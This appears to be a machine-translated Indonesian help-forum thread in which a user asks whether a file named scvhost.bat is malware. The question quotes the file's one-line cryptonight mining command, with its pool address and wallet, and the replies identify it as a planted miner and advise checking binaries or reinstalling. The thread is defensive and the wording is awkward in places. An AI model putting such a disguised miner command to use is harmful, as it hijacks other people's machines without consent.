Apakah ini scvhost.bat dengan cryptonight virus atau penambang?

17

Saya baru saja menemukan file .bat ini yang bernama scvhost.bat. File memiliki konten ini di dalamnya:

scvhost -a cryptonight -o stratum+tcp://xmr-eu.dwarfpool.com:8005 -u 48uh2mrdkdq2tQysfkX2hZDi2hkRua4GX13EqY8djJ5xNXhez7baztVWbwXa34vUMveKAzAiA4j8xgUi29TpKXpm42jqV6H.microSf -p MXXXXXX-t 02

Apakah ini virus (untuk mencuri info dll) atau penambang yang ditanam? Saya khawatir karena saya juga mencoba-coba mata uang kripto dan stratummerupakan mata uang yang disebutkan dalam file di atas.

windows batch-file malware cryptomining Program Pemula
sumber
1
Ini memang tampaknya menjadi penambang. Mengingat Anda menggunakan mata uang kripto sendiri, jika Anda juga memiliki mata uang saya, pastikan ini bukan bagian dari apa pun yang Anda gunakan untuk menambang. Anda dapat melakukannya dengan mengganti nama ekstensi .bat ke sesuatu yang lain dan lihat apakah Anda masih dapat menambang setelah reboot. Satu hal yang saya temukan aneh tentang file ini adalah bahwa biasanya akan memanggil dirinya sendiri mengingat bahwa scvhost adalah nama dari apa yang dijalankan dan file bat. Biasanya itu akan menghasilkan satu lingkaran.
LPChip
2
@VirtualAnomaly Saya pikir Anda salah sVChost dengan sCVhost disebutkan di sini. Ya, saya sangat sadar bahwa svchost adalah mekanisme untuk layanan hosting.
LPChip
2
@ LPChip Permintaan maaf saya, Anda benar, saya salah.
Virtual Anomaly
2
Seseorang memainkan Starcraft terlalu banyak, kurasa.
CodesInChaos
1
@lucidbrot SCV adalah unit "pembangun" dari salah satu ras game (terrans), dalam hal ini singkatan dari "Space Construction Vehicle".
Aaron

Jawaban:

34

Tampaknya ini semacam penambang, terutama karena parameternya berisi URL ke kumpulan penambangan. Namun, Anda perlu memastikan apa yang ada dalam biner. Masuk akal untuk membandingkan checksum dari biner yang Anda temukan dari sistem Anda dengan rilis yang dibuat oleh tim pengembangan penambang. Jika mereka berbeda; anggap sistem Anda tidak aman.

Masalah lain adalah Anda mengetahui tentang penambang ini (mungkin karena menggunakan banyak CPU), tetapi Anda tidak tahu apa lagi yang terjadi pada sistem Anda. Jika penyusup bisa meluncurkan penambang, mereka bisa meluncurkan hal-hal lain juga. Mungkin ide yang baik untuk memulihkan dari cadangan atau melakukan instalasi baru.

mtak
sumber